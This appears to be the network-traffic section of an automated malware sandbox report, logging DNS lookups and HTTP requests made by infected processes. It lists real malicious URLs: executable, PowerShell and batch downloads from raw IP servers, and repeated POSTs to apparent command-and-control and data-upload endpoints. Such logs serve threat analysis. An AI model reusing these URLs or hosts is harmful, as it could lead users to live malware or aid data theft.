                                                                                              IN A
                                                                                              Response
                                                                                              mxs.mail.ru
                                                                                              IN A
                                                                                              94.100.180.31
                                                                                              mxs.mail.ru
                                                                                              IN A
                                                                                              217.69.139.150
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:57 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ocab8szP6Bq0lk0vcWVCsA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2fab9v3v5DxPTfgzKuoOfZTAtYjlL50kKDRZPD5rG6Oezbw4v9OVw; expires=Tue, 19-Aug-2025 00:34:57 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/unique2/random.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/unique2/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:53 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 3975168
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:10:37 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b664ed-3ca800"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              DNS
                                                                                              edcatiofireeu.shop
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              edcatiofireeu.shop
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              impolitewearr.biz
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              impolitewearr.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              toppyneedus.biz
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              toppyneedus.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              lightdeerysua.biz
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              lightdeerysua.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              suggestyuoz.biz
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              suggestyuoz.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              hoursuhouy.biz
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              hoursuhouy.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mixedrecipew.biz
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mixedrecipew.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              affordtempyo.biz
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              affordtempyo.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              pleasedcfrown.biz
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              pleasedcfrown.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              steamcommunity.com
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              Response
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              104.82.234.109
                                                                                            • flag-us
                                                                                              DNS
                                                                                              steamcommunity.com
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://steamcommunity.com/profiles/76561199724331900
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              104.82.234.109:443
                                                                                              Request
                                                                                              GET /profiles/76561199724331900 HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: steamcommunity.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Date: Thu, 20 Feb 2025 00:34:58 GMT
                                                                                              Content-Length: 29488
                                                                                              Connection: keep-alive
                                                                                              Set-Cookie: sessionid=1ecb631464e5cc2005adb6ca; Path=/; Secure; SameSite=None
                                                                                              Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                                                            • 150.171.28.10:443
                                                                                              https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
                                                                                              tls, http2
                                                                                              2.0kB
                                                                                               9.4kB
                                                                                               22
                                                                                              19

                                                                                              HTTP Request

                                                                                              GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=

                                                                                              HTTP Response

                                                                                              204

                                                                                              HTTP Request

                                                                                              GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=

                                                                                              HTTP Response

                                                                                              204

                                                                                              HTTP Request

                                                                                              GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=

                                                                                              HTTP Response

                                                                                              204
                                                                                            • 2.18.27.82:443
                                                                                              https://www.bing.com/th?id=OADD2.10239414284817_1UVYYSBXC4CID8KBL&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90
                                                                                              tls, http2
                                                                                              1.6kB
                                                                                               7.3kB
                                                                                               18
                                                                                              14

                                                                                              HTTP Request

                                                                                              GET https://www.bing.com/th?id=OADD2.10239414284817_1UVYYSBXC4CID8KBL&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.215.113.16:80
                                                                                              http://185.215.113.16/mine/random.exe
                                                                                              http
                                                                                              powershell.exe
                                                                                              57.9kB
                                                                                               2.2MB
                                                                                               1115
                                                                                              1580

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/mine/random.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.215.113.43:80
                                                                                              http://185.215.113.43/Zu7JuNko/index.php
                                                                                              http
                                                                                              skotes.exe
                                                                                              8.1kB
                                                                                               10.5kB
                                                                                               62
                                                                                              42

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.215.113.75:80
                                                                                              http://185.215.113.75/files/5996006993/dzvh4HC.exe
                                                                                              http
                                                                                              skotes.exe
                                                                                              1.4MB
                                                                                               58.4MB
                                                                                               29543
                                                                                              41819

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/748049926/kdMujZh.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/teamex_support/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/SQL_gulong1/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/smirnov2626/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/martin1/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/bonus_max/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/5728215906/d2YQIJa.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/1760365699/f3Ypd8O.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/5803047068/oKUl4yo.exe

                                                                                              HTTP Response

                                                                                              404

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/7098980627/7aencsM.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/1506757897/tYliuwV.ps1

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/7708303768/9aiiMOQ.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/osint1618/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/5803047068/ymy1CwP.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/ReverseSheller/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/asjduwgsgausi/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/martin2/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/5996006993/dzvh4HC.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.96.1:443
                                                                                              https://hoyoverse.blog/api
                                                                                              tls, http
                                                                                              8827e2f2e3.exe
                                                                                              3.9kB
                                                                                               11.8kB
                                                                                               20
                                                                                              22

                                                                                              HTTP Request

                                                                                              POST https://hoyoverse.blog/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://hoyoverse.blog/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://hoyoverse.blog/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.96.1:443
                                                                                              https://hoyoverse.blog/api
                                                                                              tls, http
                                                                                              8827e2f2e3.exe
                                                                                              2.3kB
                                                                                               4.9kB
                                                                                               11
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://hoyoverse.blog/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.215.113.16:80
                                                                                              http://185.215.113.16/test/amnew.exe
                                                                                              http
                                                                                              skotes.exe
                                                                                              239.5kB
                                                                                               7.2MB
                                                                                               5030
                                                                                              5172

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/testdef/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/test/am_no.bat

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/luma/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/steam/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/well/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/test/exe/random.exe

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/test/amnew.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.96.1:443
                                                                                              https://hoyoverse.blog/api
                                                                                              tls, http
                                                                                              8827e2f2e3.exe
                                                                                              1.4kB
                                                                                               5.2kB
                                                                                               11
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://hoyoverse.blog/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.215.113.16:80
                                                                                              http://185.215.113.16/defend/random.exe
                                                                                              http
                                                                                              powershell.exe
                                                                                              40.6kB
                                                                                               1.8MB
                                                                                               830
                                                                                              1258

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/defend/random.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 103.84.89.222:33791
                                                                                              http://103.84.89.222:33791/
                                                                                              http
                                                                                              0f807048bd.exe
                                                                                              43.9MB
                                                                                               777.4kB
                                                                                               31536
                                                                                              17189

                                                                                              HTTP Request

                                                                                              POST http://103.84.89.222:33791/

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://103.84.89.222:33791/

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://103.84.89.222:33791/

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://103.84.89.222:33791/
                                                                                            • 185.215.113.16:80
                                                                                              http://185.215.113.16/mine/random.exe
                                                                                              http
                                                                                              powershell.exe
                                                                                              52.8kB
                                                                                               2.2MB
                                                                                               1029
                                                                                              1575

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/mine/random.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.26.12.31:443
                                                                                              https://api.ip.sb/geoip
                                                                                              tls, http
                                                                                              0f807048bd.exe
                                                                                              759 B
                                                                                               4.7kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              GET https://api.ip.sb/geoip

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 52.22.198.150:443
                                                                                              httpbin.org
                                                                                              tls
                                                                                              90ced29b15.exe
                                                                                              1.5kB
                                                                                               6.4kB
                                                                                               14
                                                                                              15
                                                                                            • 185.72.145.179:80
                                                                                              http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006
                                                                                              http
                                                                                              90ced29b15.exe
                                                                                              463.2kB
                                                                                               7.1kB
                                                                                               338
                                                                                              174

                                                                                              HTTP Request

                                                                                              POST http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              40e0b6ad21.exe
                                                                                              3.9kB
                                                                                               12.0kB
                                                                                               19
                                                                                              20

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.72.145.179:80
                                                                                              http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006?argument=CMFIEukv9P2cH9cA1740011607
                                                                                              http
                                                                                              90ced29b15.exe
                                                                                              201.5kB
                                                                                               11.1MB
                                                                                               4260
                                                                                              7976

                                                                                              HTTP Request

                                                                                              GET http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006?argument=CMFIEukv9P2cH9cA1740011607

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              40e0b6ad21.exe
                                                                                              2.2kB
                                                                                               5.1kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              40e0b6ad21.exe
                                                                                              1.2kB
                                                                                               5.1kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              d2YQIJa.exe
                                                                                              3.9kB
                                                                                               12.0kB
                                                                                               19
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              d2YQIJa.exe
                                                                                              2.3kB
                                                                                               5.2kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              d2YQIJa.exe
                                                                                              1.2kB
                                                                                               5.1kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              f3Ypd8O.exe
                                                                                              3.9kB
                                                                                               11.8kB
                                                                                               19
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              f3Ypd8O.exe
                                                                                              2.2kB
                                                                                               4.9kB
                                                                                               10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              f3Ypd8O.exe
                                                                                              1.2kB
                                                                                               4.8kB
                                                                                               9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              861 B
                                                                                               2.7kB
                                                                                               11
                                                                                              8

                                                                                              HTTP Request

                                                                                              GET https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.3kB
                                                                                               622 B
                                                                                               9
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.4kB
                                                                                               2.8kB
                                                                                               10
                                                                                              7

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.5kB
                                                                                               6.5kB
                                                                                               13
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.3kB
                                                                                               672 B
                                                                                               9
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              5.9kB
                                                                                               605 B
                                                                                               13
                                                                                              7

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.3kB
                                                                                               558 B
                                                                                               9
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.5kB
                                                                                               565 B
                                                                                               9
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.72.145.179:80
                                                                                              http://fivenn5sr.top/v1/upload.php
                                                                                              http
                                                                                              90ced29b15.exe
                                                                                              874 B
                                                                                               387 B
                                                                                               5
                                                                                              3

                                                                                              HTTP Request

                                                                                              POST http://fivenn5sr.top/v1/upload.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 172.217.169.78:443
                                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              1.9kB
                                                                                               9.3kB
                                                                                               13
                                                                                              16

                                                                                              HTTP Request

                                                                                              GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                            • 142.250.200.4:443
                                                                                              https://www.google.com/async/newtab_promos
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              3.1kB
                                                                                               45.2kB
                                                                                               42
                                                                                              44

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/ddljson?async=ntp:2

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/newtab_promos
                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              tls
                                                                                              chrome.exe
                                                                                              980 B
                                                                                               4.6kB
                                                                                               9
                                                                                              7
                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              tls
                                                                                              chrome.exe
                                                                                              1.0kB
                                                                                               4.6kB
                                                                                               9
                                                                                              7
